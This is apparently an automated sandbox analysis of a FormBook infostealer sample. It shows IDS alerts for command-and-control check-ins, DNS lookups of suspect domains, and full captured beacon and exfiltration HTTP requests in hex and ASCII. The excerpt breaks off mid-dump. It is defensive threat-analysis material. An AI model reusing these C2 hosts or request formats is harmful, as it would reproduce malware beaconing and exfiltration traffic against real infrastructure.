            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54121 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54123 -> 109.95.158.127:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54124 -> 109.95.158.127:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:54122 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54125 -> 109.95.158.127:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54144 -> 35.241.42.217:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54153 -> 116.213.43.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54117 -> 217.116.0.191:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54120 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54113 -> 38.12.1.29:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:54110 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54128 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54147 -> 76.223.67.189:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54143 -> 35.241.42.217:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54139 -> 216.83.33.145:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:54130 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:54118 -> 217.116.0.191:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:54126 -> 109.95.158.127:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54129 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54148 -> 76.223.67.189:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54141 -> 216.83.33.145:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:54154 -> 116.213.43.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54131 -> 64.226.69.42:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54111 -> 38.12.1.29:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54149 -> 76.223.67.189:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54135 -> 203.161.55.102:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:54114 -> 38.12.1.29:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54136 -> 203.161.55.102:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54156 -> 116.213.43.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54133 -> 64.226.69.42:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:54138 -> 203.161.55.102:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54119 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54140 -> 216.83.33.145:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54137 -> 203.161.55.102:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:54150 -> 76.223.67.189:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:54146 -> 35.241.42.217:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54157 -> 116.213.43.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:54142 -> 216.83.33.145:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:54158 -> 116.213.43.190:80
            Source: Joe Sandbox ViewIP Address: 217.116.0.191 217.116.0.191
            Source: Joe Sandbox ViewIP Address: 76.223.67.189 76.223.67.189
            Source: Joe Sandbox ViewASN Name: ACENS_ASSpainHostinghousingandVPNservicesES ACENS_ASSpainHostinghousingandVPNservicesES
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A925E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00A925E2
            Source: global trafficHTTP traffic detected: GET /toda/?dZo=obOL9JCgNxwS4++f28d79f/ijUfggy2g0sHVZkybihQ0FoV35C0OF1DRqfJh8iiswTwJQUV87m+YN/qkLbPePyq+6ekfY+odIcNiDDxjsozDdHvvMQ==&gta=rzqXf4A02FEl_8 HTTP/1.1Host: www.stemfiniti.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /pjmu/?dZo=zh3d17Jww7lUdSTktMhNBhMmvkGT0/ltGm9RdVCgVGhfN4W3cKL6T1z80tBiQSN9EuR6w+tbLdSr4eDL0g7GOxg8UddFklL4THbJOpCVHjpswub4FA==&gta=rzqXf4A02FEl_8 HTTP/1.1Host: www.zhuan-tou.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /7ffx/?dZo=bNQ0/ONSUiz8Cvet9WekHsY6glAUeAndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOWwD/JAve0FsHL38A7prpbz1xNEjliw==&gta=rzqXf4A02FEl_8 HTTP/1.1Host: www.lecoinsa.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /1nsp/?dZo=6szqGuj1zCBS7eEWPK4Hj+gRK/nLAiE2u/M2YSpUojnZUd8wkmCllhvxE7Evl1FAmV96l4GO8z837fuNk080e6UseLZVk0HIGeIsBEAgRXg1wr3NJQ==&gta=rzqXf4A02FEl_8 HTTP/1.1Host: www.8xbe578.appAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /8unq/?dZo=RkvL3PdT4df/OPkOf449nqUAFGXcSYeZ27MerosBZGKwWjBg2nbmkc0XZ9UwXf1WVngj3AiTKIg7OIM24x6m5z8EhJuaQ15Cv8EbgH9K+rgnKqPuIQ==&gta=rzqXf4A02FEl_8 HTTP/1.1Host: www.synergon.spaceAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /7ie4/?dZo=dUG4+DDdp/sjDloUpc1Pa9oz3rcpcCK2XiMiOZkD44FSjL1BUJC0B7Zb9pCmeCfVXkmAFvPPogGRRoivKVhLlnR8W+DQIbNoQ2kneVhnOJg05D70cg==&gta=rzqXf4A02FEl_8 HTTP/1.1Host: www.alanbeanart.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /rdfm/?dZo=wrkGspiQ383g8BvTCApReourbo49wGJxXTgxDOVN343rP+tlYZO/fXuOHfGNTjam/0/D7Ya5sDuP+VmElkMvPUBNIOaE5m9808ARfJeYmxykw2Zy3w==&gta=rzqXf4A02FEl_8 HTTP/1.1Host: www.kacotae.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /irn0/?dZo=rkk12BbGqxBZ8yyWFarCeZT80GKzND/TKAT51RD3LUS3uLR6Pe1z8Bplr8mj2yMFe4BX6hO/FEyyRDMjbgdyK4b8CTwfAsUn2lCVR5NZfuQrKb84WQ==&gta=rzqXf4A02FEl_8 HTTP/1.1Host: www.slushcafe.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /mpex/?dZo=Zb/vXsPYNAfjWKU6DONX2DmivYpazk1zNhfSVr6onri574wTGgCf5cxGoeAVsjx/n1bbhUl7cIXTAf7wH/T3VTZ4C1VoYJ2+BjO5oufoKkfdfMAaow==&gta=rzqXf4A02FEl_8 HTTP/1.1Host: www.a9jcpf.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /zjwj/?dZo=nHLCZn8vN2ArVDTu2n5oID6vRNbj9hrWV4l8hQoFqQuK0GTLFPexr5xj3EirNaSr0bv3za4OohaILLkKIoyZXyXWPQEhmyBEuX+CqEarOAabuvO7hw==&gta=rzqXf4A02FEl_8 HTTP/1.1Host: www.tqfabxah.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /l2ei/?dZo=2NxpSnefRSOpgA+Cw+nYyIA+NZzll6fiLmMZXjpfeHguawaVYOMhehQzwyXJSn5dNV3paxCkLfqDWT9yLxINn5BMEGgIAwhvnt05vUIz6811FQIGXw==&gta=rzqXf4A02FEl_8 HTTP/1.1Host: www.rtrpodcast.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /jda9/?dZo=34snQIO0a+qzYlkumKI+eaAwv3nNcrL7qOToIJHZshoLhvuGziw8TW5Od2ToMUc/iXvMW07TMOYG4pWJ/ehZNMDgqEYgAwPZ0d7uU4aGTG2kjdzpwg==&gta=rzqXf4A02FEl_8 HTTP/1.1Host: www.mqmsqkw.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /yxos/?dZo=GsI4mtIQVr1bqd+WnFq+jxjWo9OGL2g8JQsV9k25RNexwN7KNHOmJ2uIpR4VD7Ui+v6cwkDz1p2XqdzqrAR3g5VMmjRWjtblZDXQIQIDqIzGBnVicw==&gta=rzqXf4A02FEl_8 HTTP/1.1Host: www.lfghtko.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficDNS traffic detected: DNS query: 56.126.166.20.in-addr.arpa
            Source: global trafficDNS traffic detected: DNS query: www.stemfiniti.com
            Source: global trafficDNS traffic detected: DNS query: www.zhuan-tou.com
            Source: global trafficDNS traffic detected: DNS query: www.lecoinsa.net
            Source: global trafficDNS traffic detected: DNS query: www.8xbe578.app
            Source: global trafficDNS traffic detected: DNS query: www.synergon.space
            Source: global trafficDNS traffic detected: DNS query: www.alanbeanart.com
            Source: global trafficDNS traffic detected: DNS query: www.kacotae.com
            Source: global trafficDNS traffic detected: DNS query: www.slushcafe.top
            Source: global trafficDNS traffic detected: DNS query: www.a9jcpf.top
            Source: global trafficDNS traffic detected: DNS query: www.tqfabxah.com
            Source: global trafficDNS traffic detected: DNS query: www.rtrpodcast.online
            Source: global trafficDNS traffic detected: DNS query: www.winkthree.com
            Source: global trafficDNS traffic detected: DNS query: www.mqmsqkw.lol
            Source: global trafficDNS traffic detected: DNS query: www.lfghtko.lol
            Source: unknownHTTP traffic detected: POST /pjmu/ HTTP/1.1Host: www.zhuan-tou.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enOrigin: http://www.zhuan-tou.comReferer: http://www.zhuan-tou.com/pjmu/Content-Length: 192Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31Data Raw: 64 5a 6f 3d 2b 6a 66 39 32 4f 4e 31 36 59 6b 49 66 54 72 59 7a 4e 41 32 41 32 31 33 7a 6b 79 64 76 4b 35 73 43 77 5a 4a 65 52 53 6c 66 48 38 59 4b 59 61 48 45 4a 33 39 55 47 4c 31 6a 59 68 30 4e 32 4e 48 42 38 52 5a 77 74 68 2f 4f 73 4b 44 7a 50 4c 71 78 30 72 45 5a 68 38 4e 55 75 39 46 68 6c 66 4b 56 47 36 61 4d 35 79 38 43 67 6c 47 31 39 2f 7a 47 69 4b 6d 41 6c 52 38 57 56 67 2f 2f 42 6f 39 47 37 58 4b 56 6e 4d 59 4b 56 56 56 62 5a 2b 34 34 31 58 72 48 7a 4a 69 57 37 49 69 70 4c 7a 72 62 4d 6d 72 54 6f 54 51 30 4a 4e 6b 70 5a 6b 54 52 42 68 6c 44 44 59 71 36 75 5a 6a Data Ascii: dZo=+jf92ON16YkIfTrYzNA2A213zkydvK5sCwZJeRSlfH8YKYaHEJ39UGL1jYh0N2NHB8RZwth/OsKDzPLqx0rEZh8NUu9FhlfKVG6aM5y8CglG19/zGiKmAlR8WVg//Bo9G7XKVnMYKVVVbZ+441XrHzJiW7IipLzrbMmrToTQ0JNkpZkTRBhlDDYq6uZj
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 18 Aug 2024 16:24:57 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 18 Aug 2024 16:25:00 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 18 Aug 2024 16:25:02 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 18 Aug 2024 16:25:05 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 